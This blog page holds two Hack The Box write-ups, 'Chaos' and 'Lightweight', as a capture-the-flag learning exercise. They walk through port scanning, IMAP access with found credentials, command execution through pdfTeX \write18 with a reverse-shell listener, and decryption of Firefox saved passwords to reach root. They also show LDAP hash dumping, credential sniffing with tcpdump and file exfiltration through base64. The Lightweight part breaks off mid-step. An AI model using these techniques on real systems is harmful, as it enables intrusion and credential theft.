Hackthebox Chaos Writeup

08 Jun 2019

placeholder

Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of machine “Chaos” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.120 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-05 10:19 EEST
Nmap scan report for chaos (10.10.10.120)
Host is up (0.035s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING AUTH-RESP-CODE STLS SASL CAPA UIDL TOP
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE have more SASL-IR post-login LITERAL+ listed capabilities IDLE ID LOGIN-REFERRALS IMAP4rev1 Pre-login STARTTLS OK LOGINDISABLEDA0001
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE have SASL-IR more LITERAL+ post-login listed IDLE ID AUTH=PLAINA0001 IMAP4rev1 capabilities Pre-login OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING USER AUTH-RESP-CODE SASL(PLAIN) CAPA UIDL TOP
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open  http     MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.86 seconds

Gobuster HTTP:

root@kali:~# gobuster -u http://10.10.10.120/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.120/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2019/06/05 10:23:29 Starting gobuster
=====================================================
/wp (Status: 301)
/javascript (Status: 301)
/server-status (Status: 403)
=====================================================
2019/06/05 10:50:39 Finished
=====================================================

2. Getting User

We found a ditrectory “wp” and it has wordpress website. placeholder

It shows a password input box for protected area of this page. placeholder

As we can see, this post is by user “human”.
So put “human” as a password, we can pass the authentication and get following credential for webmail. placeholder

ayush:jiujitsu

IMAP/IMAPS is running on this server and it’s accessible for other hosts.
We can use openssl as a ssl client to access to IMAPS..

root@kali:~# openssl s_client -connect 10.10.10.120:993

~~~

a login ayush jiujitsu
a OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in

By following command, we can enumerate the mail box.
We have only one mail in the box “Drafts”.

a list "" *
* LIST (\NoInferiors \UnMarked \Drafts) "/" Drafts
* LIST (\NoInferiors \UnMarked \Sent) "/" Sent
* LIST (\HasNoChildren) "/" INBOX
a OK List completed (0.003 + 0.000 + 0.002 secs).

a select Drafts
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1540728611] UIDs valid
* OK [UIDNEXT 5] Predicted next UID
a OK [READ-WRITE] Select completed (0.003 + 0.000 + 0.002 secs).

a select Sent
* OK [CLOSED] Previous mailbox closed.
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1540728610] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
a OK [READ-WRITE] Select completed (0.002 + 0.000 + 0.001 secs).

a select INBOX
* OK [CLOSED] Previous mailbox closed.
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1540728609] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
a OK [READ-WRITE] Select completed (0.001 + 0.000 + 0.001 secs).

After selected “Draft”, we can read the mail and attached files by following command.

a fetch 1 body[]    
* 1 FETCH (BODY[] {2532}
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="=_00b34a28b9033c43ed09c0950f4176e1"
Date: Sun, 28 Oct 2018 17:46:38 +0530
From: ayush <ayush@localhost>
To: undisclosed-recipients:;
Subject: service
Message-ID: <7203426a8678788517ce8d28103461bd@webmail.chaos.htb>
X-Sender: ayush@localhost
User-Agent: Roundcube Webmail/1.3.8

--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
 format=flowed

Hii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush

--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
 name=enim_msg.txt
Content-Disposition: attachment;
 filename=enim_msg.txt;
 size=272

MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
 name=en.py
Content-Disposition: attachment;
 filename=en.py;
 size=804

ZGVmIGVuY3J5cHQoa2V5LCBmaWxlbmFtZSk6CiAgICBjaHVua3NpemUgPSA2NCoxMDI0CiAgICBv
dXRwdXRGaWxlID0gImVuIiArIGZpbGVuYW1lCiAgICBmaWxlc2l6ZSA9IHN0cihvcy5wYXRoLmdl
dHNpemUoZmlsZW5hbWUpKS56ZmlsbCgxNikKICAgIElWID1SYW5kb20ubmV3KCkucmVhZCgxNikK
CiAgICBlbmNyeXB0b3IgPSBBRVMubmV3KGtleSwgQUVTLk1PREVfQ0JDLCBJVikKCiAgICB3aXRo
IG9wZW4oZmlsZW5hbWUsICdyYicpIGFzIGluZmlsZToKICAgICAgICB3aXRoIG9wZW4ob3V0cHV0
RmlsZSwgJ3diJykgYXMgb3V0ZmlsZToKICAgICAgICAgICAgb3V0ZmlsZS53cml0ZShmaWxlc2l6
ZS5lbmNvZGUoJ3V0Zi04JykpCiAgICAgICAgICAgIG91dGZpbGUud3JpdGUoSVYpCgogICAgICAg
ICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICAgICAgY2h1bmsgPSBpbmZpbGUucmVhZChjaHVu
a3NpemUpCgogICAgICAgICAgICAgICAgaWYgbGVuKGNodW5rKSA9PSAwOgogICAgICAgICAgICAg
ICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBlbGlmIGxlbihjaHVuaykgJSAxNiAhPSAwOgog
ICAgICAgICAgICAgICAgICAgIGNodW5rICs9IGInICcgKiAoMTYgLSAobGVuKGNodW5rKSAlIDE2
KSkKCiAgICAgICAgICAgICAgICBvdXRmaWxlLndyaXRlKGVuY3J5cHRvci5lbmNyeXB0KGNodW5r
KSkKCmRlZiBnZXRLZXkocGFzc3dvcmQpOgogICAgICAgICAgICBoYXNoZXIgPSBTSEEyNTYubmV3
KHBhc3N3b3JkLmVuY29kZSgndXRmLTgnKSkKICAgICAgICAgICAgcmV0dXJuIGhhc2hlci5kaWdl
c3QoKQoK
--=_00b34a28b9033c43ed09c0950f4176e1--
)
a OK Fetch completed (0.002 + 0.000 + 0.001 secs).

It’s just base64 encoded messages. Easy to decode en.py.
However, enim_msg.txt is encrypted so we still need one step to get correct message.

root@kali:~# cat en.py 
ZGVmIGVuY3J5cHQoa2V5LCBmaWxlbmFtZSk6CiAgICBjaHVua3NpemUgPSA2NCoxMDI0CiAgICBv
dXRwdXRGaWxlID0gImVuIiArIGZpbGVuYW1lCiAgICBmaWxlc2l6ZSA9IHN0cihvcy5wYXRoLmdl
dHNpemUoZmlsZW5hbWUpKS56ZmlsbCgxNikKICAgIElWID1SYW5kb20ubmV3KCkucmVhZCgxNikK
CiAgICBlbmNyeXB0b3IgPSBBRVMubmV3KGtleSwgQUVTLk1PREVfQ0JDLCBJVikKCiAgICB3aXRo
IG9wZW4oZmlsZW5hbWUsICdyYicpIGFzIGluZmlsZToKICAgICAgICB3aXRoIG9wZW4ob3V0cHV0
RmlsZSwgJ3diJykgYXMgb3V0ZmlsZToKICAgICAgICAgICAgb3V0ZmlsZS53cml0ZShmaWxlc2l6
ZS5lbmNvZGUoJ3V0Zi04JykpCiAgICAgICAgICAgIG91dGZpbGUud3JpdGUoSVYpCgogICAgICAg
ICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICAgICAgY2h1bmsgPSBpbmZpbGUucmVhZChjaHVu
a3NpemUpCgogICAgICAgICAgICAgICAgaWYgbGVuKGNodW5rKSA9PSAwOgogICAgICAgICAgICAg
ICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBlbGlmIGxlbihjaHVuaykgJSAxNiAhPSAwOgog
ICAgICAgICAgICAgICAgICAgIGNodW5rICs9IGInICcgKiAoMTYgLSAobGVuKGNodW5rKSAlIDE2
KSkKCiAgICAgICAgICAgICAgICBvdXRmaWxlLndyaXRlKGVuY3J5cHRvci5lbmNyeXB0KGNodW5r
KSkKCmRlZiBnZXRLZXkocGFzc3dvcmQpOgogICAgICAgICAgICBoYXNoZXIgPSBTSEEyNTYubmV3
KHBhc3N3b3JkLmVuY29kZSgndXRmLTgnKSkKICAgICAgICAgICAgcmV0dXJuIGhhc2hlci5kaWdl
c3QoKQoK

root@kali:~# cat en.py | base64 -d
def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV =Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
            hasher = SHA256.new(password.encode('utf-8'))
            return hasher.digest()

root@kali:~# cat enim_msg.txt 
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=

root@kali:~# cat enim_msg.txt | base64 -d
0000000000000234��z�سpK8�ZC����^9�kW����&w�9ܾ����E��'q�[���9�Z��3����.�C��������;��3������6���R`n
                퍦3�>�}3A����d��FY
                                  ��YDo!�R#~�[��8����a4❄��á>)K�M^�z�I���,��ݨB���qݕYqˏR���q�M�ߟ.w�ʢF�@m�9
                        �JD����(�^�7�5~�"���}��0�?�U�qX(��r�]�w���zGO

Sounds like this is a python script to encrypt given message.
We can find this code in this repository and we can find a code to decrypt the code as well.

By following command, we can decrypt the encrypted message.

root@kali:~# cat enim_msg.txt 
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=

root@kali:~# cat enim_msg.txt | base64 -d > bin.hacklab

root@kali:~# python Python-Scripts/crypto.py -d bin.hacklab -p sahay


	
	               |
	               |
	          -----+------        -----------
	               |                                   
	               |
	    )                                           (
	    \ \                                       / /
	     \ |\                                   / |/
	      \|  \           hack1lab            /   /
	       \   |\         --------          / |  /
	        \  |  \_______________________/   | /
	         \ |    |      |      |      |    |/
	          \|    |      |      |      |    /
	           \____|______|______|______|___/



	              By: @hacklab, @mohamed1lar
	          fb.me/hack1lab, fb.me/mohamed1lar


[+] Decrypting......
[+] removing file......

[+] Done

root@kali:~# cat bin
SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK

root@kali:~# cat bin | base64 -d
Hii Sahay

Please check our new service which create pdf

p.s - As you told me to encrypt important msg, i did :)

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Thanks,
Ayush

Sounds like we have something interesting in address “http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3”
We have to add following line in “/etc/hosts” for name resolution.

10.10.10.120	chaos.htb

We have an interesting page to create a pdf file there. placeholder

If we see the response, we can figure out this page is using pdfTex version 3.14159265-2.6-1.40.19 placeholder

At the same time, we can find a line “\write18 enabled”.
This means, we can execute shell command by having a payload and push the button “Create PDF”. placeholder

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.120] 49920
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Then, get a full shell as ayush.

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$

www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ su - ayush
Password: jiujitsu

ayush@chaos:~$

However, we don’t have appropriate value in $PATH.
We have to modify the value.

ayush@chaos:~$ ls
ls
Command 'ls' is available in '/bin/ls'
The command could not be located because '/bin' is not included in the PATH environment variable.
ls: command not found

ayush@chaos:~$ echo $PATH
echo $PATH
/home/ayush/.app

By export command, we can put some additional value and it enables other shell command.
“User.txt” is in the directory “/home/ayush”.

ayush@chaos:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

ayush@chaos:~$ echo $PATH
/home/ayush/.app:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

ayush@chaos:~$ ls
mail  user.txt

ayush@chaos:~$ cat user.txt
eef39126d9c3b4b8a30286970dc713e1

3. Getting Root

In the home directory of ayush, we have “.mozilla” directory.

ayush@chaos:~$ ls -la
total 40
drwx------ 6 ayush ayush 4096 Jun  8 06:15 .
drwxr-xr-x 4 root  root  4096 Oct 28  2018 ..
drwxr-xr-x 2 root  root  4096 Oct 28  2018 .app
-rw------- 1 root  root     0 Nov 24  2018 .bash_history
-rw-r--r-- 1 ayush ayush  220 Oct 28  2018 .bash_logout
-rwxr-xr-x 1 root  root    22 Oct 28  2018 .bashrc
drwx------ 3 ayush ayush 4096 Jun  8 06:15 .gnupg
drwx------ 3 ayush ayush 4096 Oct 28  2018 mail
drwx------ 4 ayush ayush 4096 Sep 29  2018 .mozilla
-rw-r--r-- 1 ayush ayush  807 Oct 28  2018 .profile
-rw------- 1 ayush ayush   33 Oct 28  2018 user.txt

We can find a stored credentials for firefox in “logins.json” in following directory.

ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ ls -l | grep "login"
ls -l | grep "login"
-rw------- 1 ayush ayush      570 Oct 27  2018 logins.json

ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ cat logins.json
cat logins.json
{"nextId":3,"logins":[{"id":2,"hostname":"https://chaos.htb:10000","httpRealm":null,"formSubmitURL":"https://chaos.htb:10000","usernameField":"user","passwordField":"pass","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECDSAazrlUMZFBAhbsMDAlL9iaw==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNx7bW1TuuCuBBAP8YwnxCZH0+pLo6cJJxnb","guid":"{cb6cd202-0ff8-4de5-85df-e0b8a0f18778}","encType":1,"timeCreated":1540642202692,"timeLastUsed":1540642202692,"timePasswordChanged":1540642202692,"timesUsed":1}],"disabledHosts":[],"version":2}

We can decrypt the usename and password by this script.

ayush@chaos:~$ python firefox_decrypt.py
python firefox_decrypt.py

Master Password for profile /home/ayush/.mozilla/firefox/bzo7sjt1.default: jiujitsu


Website:   https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'

With above credential, we can login as a root user.

ayush@chaos:~$ su root
su root
Password: Thiv8wrej~

root@chaos:/home/ayush# cd
cd

root@chaos:~# cat root.txt
cat root.txt
4eca7e09e3520e020884563cfbabbc70

Hackthebox Lightweight Writeup

17 May 2019

placeholder

Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of machine “Lightweight” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:/usr/share/wordlists# nmap -sV -sC -p- 10.10.10.119
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-20 07:54 EET
Nmap scan report for 10.10.10.119
Host is up (0.036s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 164.37 seconds

Since this box blocks huge traffic, we can not use gobuster here.
Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.119 -x .php

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.119/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2019/05/17 18:26:20 Starting gobuster
=====================================================
/index.php (Status: 200)
2019/05/17 18:26:21 [!] Get http://10.10.10.119/15.php: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/icons: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/docs: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/18.php: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/features: dial tcp 10.10.10.119:80: connect: connection refused
/info.php (Status: 200)
2019/05/17 18:26:21 [!] Get http://10.10.10.119/tools: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/9.php: dial tcp 10.10.10.119:80: connect: connection refused

LDAP enumeration:

root@kali:/usr/share/wordlists# nmap -p 389 10.10.10.119 --script ldap-search --script-args 'ldap.qfiler=all'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-20 08:03 EET
Nmap scan report for 10.10.10.119
Host is up (0.037s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search: 
|   Context: dc=lightweight,dc=htb
|     dn: dc=lightweight,dc=htb
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: lightweight htb
|         dc: lightweight
|     dn: cn=Manager,dc=lightweight,dc=htb
|         objectClass: organizationalRole
|         cn: Manager
|         description: Directory Manager
|     dn: ou=People,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: People
|     dn: ou=Group,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: Group
|     dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser1
|         cn: ldapuser1
|         sn: ldapuser1
|         mail: ldapuser1@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1000
|         gidNumber: 1000
|         homeDirectory: /home/ldapuser1
|     dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser2
|         cn: ldapuser2
|         sn: ldapuser2
|         mail: ldapuser2@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1001
|         gidNumber: 1001
|         homeDirectory: /home/ldapuser2
|     dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser1
|         userPassword: {crypt}x
|         gidNumber: 1000
|     dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser2
|         userPassword: {crypt}x
|_        gidNumber: 1001

Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds

2. Getting User

Since we can not use gobuster here, we have to enumerate the website manually. placeholder

In this top page, we can find links to following pages.

/info.php
/status.php
/user.php

We can find interesting information on user.php placeholder

According to this info, we can figure out we can login to this box with following credential.

10.10.14.4:10.10.14.4

root@kali:~# ssh 10.10.14.4@10.10.10.119
The authenticity of host '10.10.10.119 (10.10.10.119)' can't be established.
ECDSA key fingerprint is SHA256:FWyyew+o9WoPYkfIKGEbTMsexks1z8ZkSUs9O+2AMSU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.119' (ECDSA) to the list of known hosts.
10.10.14.4@10.10.10.119's password:  # 10.10.14.4
[10.10.14.4@lightweight ~]$

After logged in, we can find an user “10.10.14.2”.

[10.10.14.4@lightweight home]$ ls -la
total 0
drwxr-xr-x.  6 root       root        76 May 17 16:25 .
dr-xr-xr-x. 17 root       root       224 Jun 13  2018 ..
drwx------.  4 10.10.14.2 10.10.14.2  91 Nov 16 22:39 10.10.14.2
drwx------.  4 10.10.14.4 10.10.14.4  91 May 17 17:44 10.10.14.4
drwx------.  4 ldapuser1  ldapuser1  181 Jun 15  2018 ldapuser1
drwx------.  4 ldapuser2  ldapuser2  197 Jun 21  2018 ldapuser2

To get user.txt, we have to switch the user.
In the home directory of “10.10.14.2”, we can’t find anything. So we have to switch to “ldapuser1” or “ldapuser2”.

By using “getcap”, we can find that we can sniff the network traffic.

[10.10.14.4@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep

Carry on network sniffing and when we access “/status.php” with web browser,
we can find a credential of “ldapuser2”.

[10.10.14.4@lightweight ~]$ tcpdump -i any -X port ldap
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

~~~

18:23:46.631683 IP lightweight.htb.46158 > lightweight.htb.ldap: Flags [P.], seq 1:92, ack 1, win 683, options [nop,nop,TS val 7157713 ecr 7157713], length 91
	0x0000:  4500 008f 8af8 4000 4006 866f 0a0a 0a77  E.....@.@..o...w
	0x0010:  0a0a 0a77 b44e 0185 3d2b bd27 e3f3 b673  ...w.N..=+.'...s
	0x0020:  8018 02ab 2983 0000 0101 080a 006d 37d1  ....)........m7.
	0x0030:  006d 37d1 3059 0201 0160 5402 0103 042d  .m7.0Y...`T....-
	0x0040:  7569 643d 6c64 6170 7573 6572 322c 6f75  uid=ldapuser2,ou
	0x0050:  3d50 656f 706c 652c 6463 3d6c 6967 6874  =People,dc=light
	0x0060:  7765 6967 6874 2c64 633d 6874 6280 2038  weight,dc=htb..8
	0x0070:  6263 3832 3531 3333 3261 6265 3164 3766  bc8251332abe1d7f
	0x0080:  3130 3564 3365 3533 6164 3339 6163 3200  105d3e53ad39ac2.
	0x0090:  0000 0000 0000 0000 0000 0000 0000 00    ...............

~~~

^C
8 packets captured
22 packets received by filter
6 packets dropped by kernel

ldapuser2:8bc8251332abe1d7f105d3e53ad39ac2

We can switch the user with su command..
User.txt is in the directory of /home/ldapuser2.

[10.10.14.4@lightweight ~]$ su ldapuser2
Password:  # 8bc8251332abe1d7f105d3e53ad39ac2
[ldapuser2@lightweight 10.10.14.4]$

[ldapuser2@lightweight ~]$ cat user.txt
8a866d3bb7e13a57aaeb110297f48026
[ldapuser2@lightweight ~]$

3. Getting Root

In the directory /home/ldapuser2, we can find some interesting files

[ldapuser2@lightweight ~]$ ls -l
total 1868
-rw-r--r--. 1 root      root         3411 Jun 14  2018 backup.7z
-rw-rw-r--. 1 ldapuser2 ldapuser2 1520530 Jun 13  2018 OpenLDAP-Admin-Guide.pdf
-rw-rw-r--. 1 ldapuser2 ldapuser2  379983 Jun 13  2018 OpenLdap.pdf
-rw-r--r--. 1 root      root           33 Jun 15  2018 user.txt

Try to transfer “backup.7z” to our machine. We can use base64 decoding.
At first, convert it to base64 format.

[ldapuser2@lightweight ~]$ base64 -w0 backup.7z 
N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAAA...

Then, copy&paste and decode on our host.

